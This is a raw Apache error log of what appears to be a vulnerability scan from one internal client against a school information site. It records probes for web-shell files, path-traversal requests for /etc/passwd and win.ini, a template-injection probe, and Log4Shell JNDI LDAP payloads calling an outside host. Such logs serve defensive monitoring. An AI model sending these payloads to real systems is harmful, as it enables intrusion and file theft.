[Sat Oct 25 18:10:22.209972 2025] [:error] [pid 99946] [client 10.10.36.247:53996] script '/var/www/html/403.php' not found or unable to stat, referer: http://sis.nvsonline.in//403.php
[Sat Oct 25 18:10:30.054704 2025] [:error] [pid 15865] [client 10.10.36.247:54092] script '/var/www/html/a.php' not found or unable to stat, referer: http://sis.nvsonline.in//a.php
[Sat Oct 25 18:10:32.946978 2025] [:error] [pid 25621] [client 10.10.36.247:54128] script '/var/www/html/akc.php' not found or unable to stat, referer: http://sis.nvsonline.in//akc.php
[Sat Oct 25 18:10:35.472790 2025] [:error] [pid 31551] [client 10.10.36.247:54140] script '/var/www/html/byp.php' not found or unable to stat, referer: http://sis.nvsonline.in//byp.php
[Sat Oct 25 18:10:43.096314 2025] [:error] [pid 105692] [client 10.10.36.247:54174] script '/var/www/html/xml.php' not found or unable to stat, referer: http://sis.nvsonline.in//xml.php
[Sat Oct 25 18:10:50.449645 2025] [:error] [pid 99946] [client 10.10.36.247:54246] script '/var/www/html/wso.php' not found or unable to stat, referer: http://sis.nvsonline.in//wso.php
[Sat Oct 25 18:11:35.546519 2025] [:error] [pid 31551] [client 10.10.36.247:54452] script '/var/www/html/autoload_classmap.php' not found or unable to stat, referer: http://sis.nvsonline.in//autoload_classmap.php
[Sat Oct 25 18:11:42.797442 2025] [:error] [pid 99944] [client 10.10.36.247:54474] script '/var/www/html/user.php' not found or unable to stat, referer: http://sis.nvsonline.in//user.php
[Sat Oct 25 18:11:57.914597 2025] [:error] [pid 52921] [client 10.10.36.247:54524] script '/var/www/html/moon.php' not found or unable to stat, referer: http://sis.nvsonline.in//moon.php
[Sat Oct 25 18:12:05.607810 2025] [:error] [pid 25621] [client 10.10.36.247:54552] script '/var/www/html/fm.php' not found or unable to stat, referer: http://sis.nvsonline.in//fm.php
[Sat Oct 25 18:12:25.779574 2025] [:error] [pid 33852] [client 10.10.36.247:54632] script '/var/www/html/alfa.php' not found or unable to stat, referer: http://sis.nvsonline.in//alfa.php
[Sat Oct 25 18:12:28.347785 2025] [:error] [pid 15865] [client 10.10.36.247:54636] script '/var/www/html/login.php' not found or unable to stat, referer: http://sis.nvsonline.in//login.php
[Sat Oct 25 18:12:30.983737 2025] [:error] [pid 25621] [client 10.10.36.247:54652] script '/var/www/html/test.php' not found or unable to stat, referer: http://sis.nvsonline.in//test.php
[Sat Oct 25 18:12:41.462096 2025] [:error] [pid 105692] [client 10.10.36.247:54692] script '/var/www/html/x.php' not found or unable to stat, referer: http://sis.nvsonline.in//x.php
[Sat Oct 25 18:12:49.023766 2025] [:error] [pid 52921] [client 10.10.36.247:54724] script '/var/www/html/classwithtostring.php' not found or unable to stat, referer: http://sis.nvsonline.in//classwithtostring.php
[Sat Oct 25 18:13:04.308947 2025] [:error] [pid 99945] [client 10.10.36.247:54782] script '/var/www/html/cah.php' not found or unable to stat, referer: http://sis.nvsonline.in//cah.php
[Sat Oct 25 18:13:12.006309 2025] [:error] [pid 99946] [client 10.10.36.247:54812] script '/var/www/html/mah.php' not found or unable to stat, referer: http://sis.nvsonline.in//mah.php
[Sat Oct 25 18:13:17.090962 2025] [:error] [pid 33852] [client 10.10.36.247:54834] script '/var/www/html/up.php' not found or unable to stat, referer: http://sis.nvsonline.in//up.php
[Sat Oct 25 18:13:57.692122 2025] [:error] [pid 99946] [client 10.10.36.247:54994] script '/var/www/html/tiny.php' not found or unable to stat, referer: http://sis.nvsonline.in//tiny.php
[Sat Oct 25 18:14:02.758946 2025] [:error] [pid 33852] [client 10.10.36.247:55020] script '/var/www/html/file.php' not found or unable to stat, referer: http://sis.nvsonline.in//file.php
[Sat Oct 25 18:14:05.276738 2025] [:error] [pid 15865] [client 10.10.36.247:55032] script '/var/www/html/default.php' not found or unable to stat, referer: http://sis.nvsonline.in//default.php
[Sat Oct 25 18:14:20.182967 2025] [:error] [pid 99948] [client 10.10.36.247:55084] script '/var/www/html/wp-admin.php' not found or unable to stat, referer: http://sis.nvsonline.in//wp-admin.php
[Sat Oct 25 18:14:43.074406 2025] [:error] [pid 31551] [client 10.10.36.247:55172] script '/var/www/html/simple.php' not found or unable to stat, referer: http://sis.nvsonline.in//simple.php
[Wed Oct 29 00:23:26.812404 2025] [:error] [pid 63279] [client 10.10.36.247:25370] script '/var/www/html/header.php' not found or unable to stat
[Wed Oct 29 00:23:27.869148 2025] [:error] [pid 76323] [client 10.10.36.247:25378] script '/var/www/html/login.php' not found or unable to stat
[Wed Oct 29 00:23:32.504735 2025] [:error] [pid 60169] [client 10.10.36.247:25444] script '/var/www/html/header.php' not found or unable to stat
[Wed Oct 29 00:23:37.417083 2025] [:error] [pid 60320] [client 10.10.36.247:25512] script '/var/www/html/slEue3Muugwa.php' not found or unable to stat
[Wed Oct 29 00:23:38.086353 2025] [cgi:error] [pid 63275] [client 10.10.36.247:25518] script not found or unable to stat: /var/www/cgi-bin/slEue3Muugwa.html
[Wed Oct 29 00:23:38.304769 2025] [cgi:error] [pid 63279] [client 10.10.36.247:25520] script not found or unable to stat: /var/www/cgi-bin/slEue3Muugwa.cgi
[Wed Oct 29 00:23:38.522193 2025] [cgi:error] [pid 70880] [client 10.10.36.247:25522] script not found or unable to stat: /var/www/cgi-bin/slEue3Muugwa.sh
[Wed Oct 29 00:23:38.741133 2025] [cgi:error] [pid 70885] [client 10.10.36.247:25524] script not found or unable to stat: /var/www/cgi-bin/slEue3Muugwa.pl
[Wed Oct 29 00:23:38.960676 2025] [cgi:error] [pid 40745] [client 10.10.36.247:25528] script not found or unable to stat: /var/www/cgi-bin/slEue3Muugwa.inc
[Wed Oct 29 00:23:39.177219 2025] [cgi:error] [pid 76323] [client 10.10.36.247:25534] script not found or unable to stat: /var/www/cgi-bin/slEue3Muugwa.shtml
[Wed Oct 29 00:23:39.393289 2025] [cgi:error] [pid 60169] [client 10.10.36.247:25542] script not found or unable to stat: /var/www/cgi-bin/slEue3Muugwa.asp
[Wed Oct 29 00:23:39.609966 2025] [:error] [pid 60320] [client 10.10.36.247:25550] script '/var/www/cgi-bin/slEue3Muugwa.php' not found or unable to stat
[Wed Oct 29 00:23:39.840904 2025] [cgi:error] [pid 15422] [client 10.10.36.247:25556] script not found or unable to stat: /var/www/cgi-bin/slEue3Muugwa.php3
[Wed Oct 29 00:23:40.060139 2025] [cgi:error] [pid 22132] [client 10.10.36.247:25558] script not found or unable to stat: /var/www/cgi-bin/slEue3Muugwa.cfm
[Wed Oct 29 00:29:06.612314 2025] [core:error] [pid 60320] [client 10.10.36.247:26536] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Wed Oct 29 00:29:06.843418 2025] [core:error] [pid 63279] [client 10.10.36.247:26546] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
[Wed Oct 29 00:29:07.082349 2025] [:error] [pid 60320] [client 10.10.36.247:26558] script '/var/www/html/index.php' not found or unable to stat
[Wed Oct 29 00:29:07.083172 2025] [core:error] [pid 15422] [client 10.10.36.247:26560] AH00126: Invalid URI in request GET c:\\boot.ini HTTP/1.1
[Wed Oct 29 00:29:11.282004 2025] [cgi:error] [pid 70885] [client 10.10.36.247:26754] script not found or unable to stat: /var/www/cgi-bin/client_execute.cgi
[Wed Oct 29 00:29:11.931163 2025] [cgi:error] [pid 60169] [client 10.10.36.247:26780] script not found or unable to stat: /var/www/cgi-bin/authLogin.cgi
[Wed Oct 29 00:29:12.131424 2025] [cgi:error] [pid 22132] [client 10.10.36.247:26786] script not found or unable to stat: /var/www/cgi-bin/authLogin.cgi
[Wed Oct 29 00:29:12.396447 2025] [cgi:error] [pid 63275] [client 10.10.36.247:26808] script not found or unable to stat: /var/www/cgi-bin/guestimage.html
[Wed Oct 29 00:29:12.818134 2025] [cgi:error] [pid 60320] [client 10.10.36.247:26822] script not found or unable to stat: /var/www/cgi-bin/printenv
[Wed Oct 29 00:29:12.915399 2025] [:error] [pid 63275] [client 10.10.36.247:26828] script '/var/www/html/index.php' not found or unable to stat
[Wed Oct 29 00:29:13.098783 2025] [cgi:error] [pid 70880] [client 10.10.36.247:26832] script not found or unable to stat: /var/www/cgi-bin/camctrl.cgi
[Wed Oct 29 00:29:13.251877 2025] [cgi:error] [pid 70885] [client 10.10.36.247:26834] script not found or unable to stat: /var/www/cgi-bin/pdesk.cgi
[Wed Oct 29 00:29:13.322629 2025] [cgi:error] [pid 60169] [client 10.10.36.247:26840] script not found or unable to stat: /var/www/cgi-bin/ctrldirect.cgi
[Wed Oct 29 00:29:15.814532 2025] [cgi:error] [pid 63279] [client 10.10.36.247:26934] script not found or unable to stat: /var/www/cgi-bin/luci
[Wed Oct 29 00:29:16.282119 2025] [cgi:error] [pid 22132] [client 10.10.36.247:26948] script not found or unable to stat: /var/www/cgi-bin/pub
[Wed Oct 29 00:29:16.296358 2025] [cgi:error] [pid 63275] [client 10.10.36.247:26952] script not found or unable to stat: /var/www/cgi-bin/mrlg.cgi
[Wed Oct 29 00:29:19.485781 2025] [:error] [pid 60320] [client 10.10.36.247:27072] script '/var/www/html/login.php' not found or unable to stat
[Wed Oct 29 00:29:25.743323 2025] [:error] [pid 22132] [client 10.10.36.247:27318] script '/var/www/html/niet1896687225.php' not found or unable to stat
[Wed Oct 29 00:29:25.988538 2025] [cgi:error] [pid 60169] [client 10.10.36.247:27334] script not found or unable to stat: /var/www/cgi-bin/com5.pl
[Wed Oct 29 00:29:28.091515 2025] [core:error] [pid 76323] [client 10.10.36.247:27394] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Wed Oct 29 00:29:32.747296 2025] [:error] [pid 76323] [client 10.10.36.247:27516] script '/var/www/html/default.php' not found or unable to stat
[Wed Oct 29 00:29:35.095069 2025] [:error] [pid 60169] [client 10.10.36.247:27568] script '/var/www/html/update.php' not found or unable to stat
[Wed Oct 29 00:29:35.114960 2025] [cgi:error] [pid 60320] [client 10.10.36.247:27570] script not found or unable to stat: /var/www/cgi-bin/mainfunction.cgi
[Wed Oct 29 00:29:40.434794 2025] [:error] [pid 70885] [client 10.10.36.247:27708] script '/var/www/html/28i7yl9t.php' not found or unable to stat
[Wed Oct 29 00:29:40.436688 2025] [:error] [pid 76323] [client 10.10.36.247:27710] script '/var/www/html/28i7yl9t.php' not found or unable to stat
[Wed Oct 29 00:29:40.500214 2025] [core:error] [pid 63275] [client 10.10.36.247:27762] AH00126: Invalid URI in request GET HTTP/1.1
[Wed Oct 29 00:29:40.510791 2025] [core:error] [pid 70885] [client 10.10.36.247:27768] AH00126: Invalid URI in request GET HTTP/1.1
[Wed Oct 29 00:29:49.619573 2025] [:error] [pid 60169] [client 10.10.36.247:27960] script '/var/www/html/forum.php' not found or unable to stat
[Wed Oct 29 00:29:50.987909 2025] [:error] [pid 70880] [client 10.10.36.247:27998] script '/var/www/html/header.php' not found or unable to stat
[Wed Oct 29 00:29:51.225297 2025] [cgi:error] [pid 40745] [client 10.10.36.247:28006] script not found or unable to stat: /var/www/cgi-bin/index.cgi
[Wed Oct 29 00:29:51.346132 2025] [authz_core:error] [pid 60169] [client 10.10.36.247:28008] AH01630: client denied by server configuration: /var/www/html/.htaccess.old
[Wed Oct 29 00:29:51.348739 2025] [authz_core:error] [pid 60320] [client 10.10.36.247:28010] AH01630: client denied by server configuration: /var/www/html/.htaccess.bak
[Wed Oct 29 00:29:51.351583 2025] [authz_core:error] [pid 22132] [client 10.10.36.247:28012] AH01630: client denied by server configuration: /var/www/html/.htaccess~
[Wed Oct 29 00:29:51.354324 2025] [authz_core:error] [pid 15422] [client 10.10.36.247:28014] AH01630: client denied by server configuration: /var/www/html/.htaccess.copy
[Wed Oct 29 00:29:51.358286 2025] [authz_core:error] [pid 63275] [client 10.10.36.247:28016] AH01630: client denied by server configuration: /var/www/html/.htaccess.tmp
[Wed Oct 29 00:29:51.581623 2025] [authz_core:error] [pid 76323] [client 10.10.36.247:28024] AH01630: client denied by server configuration: /var/www/html/.htaccess.1
[Wed Oct 29 00:29:51.584858 2025] [authz_core:error] [pid 40745] [client 10.10.36.247:28026] AH01630: client denied by server configuration: /var/www/html/.htaccess.~1~
[Wed Oct 29 00:29:51.693162 2025] [cgi:error] [pid 60320] [client 10.10.36.247:28030] script not found or unable to stat: /var/www/cgi-bin/kvm.cgi
[Wed Oct 29 00:30:40.922832 2025] [authz_core:error] [pid 76323] [client 10.10.36.247:28506] AH01630: client denied by server configuration: /var/www/html/.htaccess
[Wed Oct 29 00:30:40.926125 2025] [authz_core:error] [pid 40745] [client 10.10.36.247:28508] AH01630: client denied by server configuration: /var/www/html/.htpasswd
[Wed Oct 29 00:30:43.579058 2025] [core:error] [pid 22132] [client 10.10.36.247:28662] AH00126: Invalid URI in request GET usaherds/Logon.aspx HTTP/1.1
[Wed Oct 29 00:32:34.452710 2025] [:error] [pid 63275] [client 10.10.36.247:29336] script '/var/www/html/internalServerReporting.php' not found or unable to stat
[Wed Oct 29 00:32:36.269120 2025] [core:error] [pid 22132] [client 10.10.36.247:29354] AH00126: Invalid URI in request GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
[Wed Oct 29 00:32:42.055208 2025] [cgi:error] [pid 60169] [client 10.10.36.247:29430] script not found or unable to stat: /var/www/cgi-bin/filescan
[Wed Oct 29 00:32:42.278437 2025] [:error] [pid 60320] [client 10.10.36.247:29432] script '/var/www/html/enter.php' not found or unable to stat
[Wed Oct 29 00:32:49.394844 2025] [core:error] [pid 40745] [client 10.10.36.247:29498] AH00126: Invalid URI in request GET /././.. HTTP/1.1
[Wed Oct 29 00:32:49.398133 2025] [core:error] [pid 60169] [client 10.10.36.247:29500] AH00126: Invalid URI in request GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../ HTTP/1.1
[Wed Oct 29 00:32:56.589729 2025] [cgi:error] [pid 63279] [client 10.10.36.247:29596] script not found or unable to stat: /var/www/cgi-bin/faqmanager.cgi
[Wed Oct 29 00:33:02.355953 2025] [core:error] [pid 63279] [client 10.10.36.247:29640] AH00126: Invalid URI in request GET %24%7B%7B57550614+16044095%7D%7D// HTTP/1.1
[Wed Oct 29 00:33:03.540633 2025] [cgi:error] [pid 60169] [client 10.10.36.247:29650] script not found or unable to stat: /var/www/cgi-bin/file_transfer.cgi
[Wed Oct 29 00:33:04.899887 2025] [cgi:error] [pid 70885] [client 10.10.36.247:29680] script not found or unable to stat: /var/www/cgi-bin/admin
[Wed Oct 29 00:33:05.116575 2025] [cgi:error] [pid 76323] [client 10.10.36.247:29684] script not found or unable to stat: /var/www/cgi-bin/admin.cgi
[Wed Oct 29 00:33:05.359388 2025] [cgi:error] [pid 40745] [client 10.10.36.247:29686] script not found or unable to stat: /var/www/cgi-bin/admin.pl
[Wed Oct 29 00:33:05.588400 2025] [cgi:error] [pid 60169] [client 10.10.36.247:29688] script not found or unable to stat: /var/www/cgi-bin/administrator
[Wed Oct 29 00:33:05.815181 2025] [cgi:error] [pid 60320] [client 10.10.36.247:29690] script not found or unable to stat: /var/www/cgi-bin/administrator.cgi
[Wed Oct 29 00:33:06.037943 2025] [cgi:error] [pid 22132] [client 10.10.36.247:29692] script not found or unable to stat: /var/www/cgi-bin/agorn.cgi
[Wed Oct 29 00:33:06.282824 2025] [cgi:error] [pid 15422] [client 10.10.36.247:29694] script not found or unable to stat: /var/www/cgi-bin/bugreport.cgi
[Wed Oct 29 00:33:06.513784 2025] [cgi:error] [pid 63275] [client 10.10.36.247:29700] script not found or unable to stat: /var/www/cgi-bin/cart.cgi
[Wed Oct 29 00:33:06.732359 2025] [cgi:error] [pid 63279] [client 10.10.36.247:29720] script not found or unable to stat: /var/www/cgi-bin/clwarn.cgi
[Wed Oct 29 00:33:06.955101 2025] [cgi:error] [pid 70880] [client 10.10.36.247:29724] script not found or unable to stat: /var/www/cgi-bin/count.cgi
[Wed Oct 29 00:33:07.181207 2025] [cgi:error] [pid 70885] [client 10.10.36.247:29726] script not found or unable to stat: /var/www/cgi-bin/Count.cgi
[Wed Oct 29 00:33:07.411336 2025] [cgi:error] [pid 76323] [client 10.10.36.247:29730] script not found or unable to stat: /var/www/cgi-bin/faqmanager.cgi
[Wed Oct 29 00:33:07.634375 2025] [cgi:error] [pid 40745] [client 10.10.36.247:29744] script not found or unable to stat: /var/www/cgi-bin/FormHandler.cgi
[Wed Oct 29 00:33:07.882669 2025] [cgi:error] [pid 60169] [client 10.10.36.247:29758] script not found or unable to stat: /var/www/cgi-bin/FormMail.cgi
[Wed Oct 29 00:33:08.127378 2025] [cgi:error] [pid 60320] [client 10.10.36.247:29774] script not found or unable to stat: /var/www/cgi-bin/guestbook.cgi
[Wed Oct 29 00:33:08.348315 2025] [cgi:error] [pid 22132] [client 10.10.36.247:29778] script not found or unable to stat: /var/www/cgi-bin/help.cgi
[Wed Oct 29 00:33:08.572635 2025] [cgi:error] [pid 15422] [client 10.10.36.247:29782] script not found or unable to stat: /var/www/cgi-bin/hi
[Wed Oct 29 00:33:08.587179 2025] [cgi:error] [pid 63275] [client 10.10.36.247:29784] script not found or unable to stat: /var/www/cgi-bin/index.cgi
[Wed Oct 29 00:33:08.814921 2025] [cgi:error] [pid 63279] [client 10.10.36.247:29802] script not found or unable to stat: /var/www/cgi-bin/index.pl
[Wed Oct 29 00:33:09.043989 2025] [cgi:error] [pid 70880] [client 10.10.36.247:29824] script not found or unable to stat: /var/www/cgi-bin/index.sh
[Wed Oct 29 00:33:09.281288 2025] [cgi:error] [pid 76323] [client 10.10.36.247:29846] script not found or unable to stat: /var/www/cgi-bin/login
[Wed Oct 29 00:33:09.507003 2025] [cgi:error] [pid 40745] [client 10.10.36.247:29864] script not found or unable to stat: /var/www/cgi-bin/login.cgi
[Wed Oct 29 00:33:09.734027 2025] [cgi:error] [pid 60169] [client 10.10.36.247:29868] script not found or unable to stat: /var/www/cgi-bin/mailit.pl
[Wed Oct 29 00:33:09.956806 2025] [cgi:error] [pid 60320] [client 10.10.36.247:29876] script not found or unable to stat: /var/www/cgi-bin/mt
[Wed Oct 29 00:33:10.181764 2025] [cgi:error] [pid 22132] [client 10.10.36.247:29880] script not found or unable to stat: /var/www/cgi-bin/mt
[Wed Oct 29 00:33:10.404712 2025] [cgi:error] [pid 15422] [client 10.10.36.247:29882] script not found or unable to stat: /var/www/cgi-bin/mt-static
[Wed Oct 29 00:33:10.632002 2025] [cgi:error] [pid 63275] [client 10.10.36.247:29884] script not found or unable to stat: /var/www/cgi-bin/mt-static
[Wed Oct 29 00:33:10.860365 2025] [cgi:error] [pid 63279] [client 10.10.36.247:29886] script not found or unable to stat: /var/www/cgi-bin/ncbook
[Wed Oct 29 00:33:11.084124 2025] [cgi:error] [pid 70880] [client 10.10.36.247:29888] script not found or unable to stat: /var/www/cgi-bin/printenv
[Wed Oct 29 00:33:11.309279 2025] [cgi:error] [pid 70885] [client 10.10.36.247:29890] script not found or unable to stat: /var/www/cgi-bin/printenv.cgi
[Wed Oct 29 00:33:11.534105 2025] [cgi:error] [pid 76323] [client 10.10.36.247:29892] script not found or unable to stat: /var/www/cgi-bin/quickstore.cgi
[Wed Oct 29 00:33:11.756311 2025] [cgi:error] [pid 40745] [client 10.10.36.247:29894] script not found or unable to stat: /var/www/cgi-bin/search
[Wed Oct 29 00:33:11.981426 2025] [cgi:error] [pid 60169] [client 10.10.36.247:29896] script not found or unable to stat: /var/www/cgi-bin/search.cgi
[Wed Oct 29 00:33:12.204493 2025] [cgi:error] [pid 60320] [client 10.10.36.247:29904] script not found or unable to stat: /var/www/cgi-bin/search
[Wed Oct 29 00:33:12.434693 2025] [cgi:error] [pid 15422] [client 10.10.36.247:29910] script not found or unable to stat: /var/www/cgi-bin/status
[Wed Oct 29 00:33:12.661985 2025] [cgi:error] [pid 63275] [client 10.10.36.247:29916] script not found or unable to stat: /var/www/cgi-bin/status.cgi
[Wed Oct 29 00:33:12.891300 2025] [cgi:error] [pid 63279] [client 10.10.36.247:29920] script not found or unable to stat: /var/www/cgi-bin/test.cgi
[Wed Oct 29 00:33:13.116054 2025] [cgi:error] [pid 70880] [client 10.10.36.247:29926] script not found or unable to stat: /var/www/cgi-bin/test.sh
[Wed Oct 29 00:33:13.340758 2025] [cgi:error] [pid 70885] [client 10.10.36.247:29930] script not found or unable to stat: /var/www/cgi-bin/test-cgi
[Wed Oct 29 00:33:13.565113 2025] [cgi:error] [pid 76323] [client 10.10.36.247:29934] script not found or unable to stat: /var/www/cgi-bin/upload.cgi
[Wed Oct 29 00:33:13.788887 2025] [cgi:error] [pid 40745] [client 10.10.36.247:29936] script not found or unable to stat: /var/www/cgi-bin/urlcount.cgi
[Wed Oct 29 00:33:14.019638 2025] [cgi:error] [pid 60169] [client 10.10.36.247:29938] script not found or unable to stat: /var/www/cgi-bin/viewcvs.cgi
[Wed Oct 29 00:33:14.251361 2025] [cgi:error] [pid 60320] [client 10.10.36.247:29940] script not found or unable to stat: /var/www/cgi-bin/wa
[Wed Oct 29 00:33:14.475849 2025] [cgi:error] [pid 22132] [client 10.10.36.247:29942] script not found or unable to stat: /var/www/cgi-bin/wa.cgi
[Wed Oct 29 00:33:14.701137 2025] [cgi:error] [pid 15422] [client 10.10.36.247:29944] script not found or unable to stat: /var/www/cgi-bin/wa.exe
[Wed Oct 29 00:33:14.927785 2025] [cgi:error] [pid 63275] [client 10.10.36.247:29948] script not found or unable to stat: /var/www/cgi-bin/whois.cgi
[Wed Oct 29 00:33:18.514378 2025] [:error] [pid 63279] [client 10.10.36.247:29994] script '/var/www/html/wp-login.php' not found or unable to stat
[Wed Oct 29 00:33:18.746851 2025] [cgi:error] [pid 76323] [client 10.10.36.247:30002] script not found or unable to stat: /var/www/cgi-bin/admin
[Wed Oct 29 00:33:18.966202 2025] [cgi:error] [pid 60169] [client 10.10.36.247:30006] script not found or unable to stat: /var/www/cgi-bin/admin.cgi
[Wed Oct 29 00:33:19.185813 2025] [cgi:error] [pid 22132] [client 10.10.36.247:30010] script not found or unable to stat: /var/www/cgi-bin/admin.pl
[Wed Oct 29 00:33:19.403101 2025] [cgi:error] [pid 15422] [client 10.10.36.247:30012] script not found or unable to stat: /var/www/cgi-bin/administrator
[Wed Oct 29 00:33:19.620638 2025] [cgi:error] [pid 63279] [client 10.10.36.247:30018] script not found or unable to stat: /var/www/cgi-bin/administrator.cgi
[Wed Oct 29 00:33:19.843417 2025] [cgi:error] [pid 76323] [client 10.10.36.247:30032] script not found or unable to stat: /var/www/cgi-bin/agorn.cgi
[Wed Oct 29 00:33:20.070367 2025] [cgi:error] [pid 60320] [client 10.10.36.247:30042] script not found or unable to stat: /var/www/cgi-bin/bugreport.cgi
[Wed Oct 29 00:33:20.292031 2025] [cgi:error] [pid 15422] [client 10.10.36.247:30058] script not found or unable to stat: /var/www/cgi-bin/cart.cgi
[Wed Oct 29 00:33:20.518090 2025] [cgi:error] [pid 63279] [client 10.10.36.247:30064] script not found or unable to stat: /var/www/cgi-bin/clwarn.cgi
[Wed Oct 29 00:33:20.743867 2025] [cgi:error] [pid 76323] [client 10.10.36.247:30082] script not found or unable to stat: /var/www/cgi-bin/count.cgi
[Wed Oct 29 00:33:20.970565 2025] [cgi:error] [pid 60320] [client 10.10.36.247:30088] script not found or unable to stat: /var/www/cgi-bin/Count.cgi
[Wed Oct 29 00:33:21.198518 2025] [cgi:error] [pid 63275] [client 10.10.36.247:30094] script not found or unable to stat: /var/www/cgi-bin/faqmanager.cgi
[Wed Oct 29 00:33:21.420605 2025] [cgi:error] [pid 63279] [client 10.10.36.247:30096] script not found or unable to stat: /var/www/cgi-bin/FormHandler.cgi
[Wed Oct 29 00:33:21.636896 2025] [cgi:error] [pid 70880] [client 10.10.36.247:30098] script not found or unable to stat: /var/www/cgi-bin/FormMail.cgi
[Wed Oct 29 00:33:21.866591 2025] [cgi:error] [pid 70885] [client 10.10.36.247:30102] script not found or unable to stat: /var/www/cgi-bin/guestbook.cgi
[Wed Oct 29 00:33:22.094000 2025] [cgi:error] [pid 76323] [client 10.10.36.247:30104] script not found or unable to stat: /var/www/cgi-bin/help.cgi
[Wed Oct 29 00:33:22.316642 2025] [cgi:error] [pid 40745] [client 10.10.36.247:30106] script not found or unable to stat: /var/www/cgi-bin/hi
[Wed Oct 29 00:33:22.543786 2025] [cgi:error] [pid 60169] [client 10.10.36.247:30108] script not found or unable to stat: /var/www/cgi-bin/index.cgi
[Wed Oct 29 00:33:22.766306 2025] [cgi:error] [pid 60320] [client 10.10.36.247:30110] script not found or unable to stat: /var/www/cgi-bin/index.pl
[Wed Oct 29 00:33:22.988718 2025] [cgi:error] [pid 22132] [client 10.10.36.247:30112] script not found or unable to stat: /var/www/cgi-bin/index.sh
[Wed Oct 29 00:33:23.213706 2025] [cgi:error] [pid 15422] [client 10.10.36.247:30114] script not found or unable to stat: /var/www/cgi-bin/login.cgi
[Wed Oct 29 00:33:23.436667 2025] [cgi:error] [pid 63275] [client 10.10.36.247:30120] script not found or unable to stat: /var/www/cgi-bin/mailit.pl
[Wed Oct 29 00:33:23.660282 2025] [cgi:error] [pid 63279] [client 10.10.36.247:30124] script not found or unable to stat: /var/www/cgi-bin/mt
[Wed Oct 29 00:33:23.883773 2025] [cgi:error] [pid 70880] [client 10.10.36.247:30130] script not found or unable to stat: /var/www/cgi-bin/mt
[Wed Oct 29 00:33:24.108471 2025] [cgi:error] [pid 70885] [client 10.10.36.247:30136] script not found or unable to stat: /var/www/cgi-bin/mt-static
[Wed Oct 29 00:33:24.333571 2025] [cgi:error] [pid 76323] [client 10.10.36.247:30138] script not found or unable to stat: /var/www/cgi-bin/mt-static
[Wed Oct 29 00:33:24.557497 2025] [cgi:error] [pid 40745] [client 10.10.36.247:30140] script not found or unable to stat: /var/www/cgi-bin/ncbook
[Wed Oct 29 00:33:24.773561 2025] [cgi:error] [pid 60169] [client 10.10.36.247:30142] script not found or unable to stat: /var/www/cgi-bin/printenv
[Wed Oct 29 00:33:24.995119 2025] [cgi:error] [pid 60320] [client 10.10.36.247:30146] script not found or unable to stat: /var/www/cgi-bin/printenv.cgi
[Wed Oct 29 00:33:25.016305 2025] [cgi:error] [pid 22132] [client 10.10.36.247:30148] script not found or unable to stat: /var/www/cgi-bin/quickstore.cgi
[Wed Oct 29 00:33:25.239125 2025] [cgi:error] [pid 15422] [client 10.10.36.247:30152] script not found or unable to stat: /var/www/cgi-bin/search
[Wed Oct 29 00:33:25.459444 2025] [cgi:error] [pid 63279] [client 10.10.36.247:30156] script not found or unable to stat: /var/www/cgi-bin/search.cgi
[Wed Oct 29 00:33:25.684884 2025] [cgi:error] [pid 70880] [client 10.10.36.247:30158] script not found or unable to stat: /var/www/cgi-bin/search
[Wed Oct 29 00:33:25.908028 2025] [cgi:error] [pid 70885] [client 10.10.36.247:30160] script not found or unable to stat: /var/www/cgi-bin/status
[Wed Oct 29 00:33:26.123828 2025] [cgi:error] [pid 76323] [client 10.10.36.247:30162] script not found or unable to stat: /var/www/cgi-bin/status.cgi
[Wed Oct 29 00:33:26.341160 2025] [cgi:error] [pid 40745] [client 10.10.36.247:30164] script not found or unable to stat: /var/www/cgi-bin/test.cgi
[Wed Oct 29 00:33:26.567359 2025] [cgi:error] [pid 60169] [client 10.10.36.247:30166] script not found or unable to stat: /var/www/cgi-bin/test.sh
[Wed Oct 29 00:33:26.789632 2025] [cgi:error] [pid 60320] [client 10.10.36.247:30168] script not found or unable to stat: /var/www/cgi-bin/test-cgi
[Wed Oct 29 00:33:27.014990 2025] [cgi:error] [pid 22132] [client 10.10.36.247:30170] script not found or unable to stat: /var/www/cgi-bin/upload.cgi
[Wed Oct 29 00:33:27.237054 2025] [cgi:error] [pid 15422] [client 10.10.36.247:30172] script not found or unable to stat: /var/www/cgi-bin/urlcount.cgi
[Wed Oct 29 00:33:27.461227 2025] [cgi:error] [pid 63275] [client 10.10.36.247:30174] script not found or unable to stat: /var/www/cgi-bin/viewcvs.cgi
[Wed Oct 29 00:33:27.689562 2025] [cgi:error] [pid 63279] [client 10.10.36.247:30176] script not found or unable to stat: /var/www/cgi-bin/wa
[Wed Oct 29 00:33:27.914980 2025] [cgi:error] [pid 70880] [client 10.10.36.247:30178] script not found or unable to stat: /var/www/cgi-bin/wa.cgi
[Wed Oct 29 00:33:28.132486 2025] [cgi:error] [pid 70885] [client 10.10.36.247:30180] script not found or unable to stat: /var/www/cgi-bin/wa.exe
[Wed Oct 29 00:33:28.369066 2025] [cgi:error] [pid 76323] [client 10.10.36.247:30186] script not found or unable to stat: /var/www/cgi-bin/whois.cgi
[Wed Oct 29 00:33:31.947496 2025] [:error] [pid 63275] [client 10.10.36.247:30222] script '/var/www/html/wp-login.php' not found or unable to stat
[Wed Oct 29 00:41:40.119058 2025] [cgi:error] [pid 60169] [client 10.10.36.247:32576] script not found or unable to stat: /var/www/cgi-bin/admin, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:41:45.388051 2025] [cgi:error] [pid 60320] [client 10.10.36.247:32586] script not found or unable to stat: /var/www/cgi-bin/admin.cgi, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
[Wed Oct 29 00:41:50.646112 2025] [cgi:error] [pid 22132] [client 10.10.36.247:32612] script not found or unable to stat: /var/www/cgi-bin/admin.pl, referer: ${jndi:ldap://log4shell-generic-nmqGWFn7QhoxLSW9ptEe${lower:ten}.w.nessus.org/nessus}
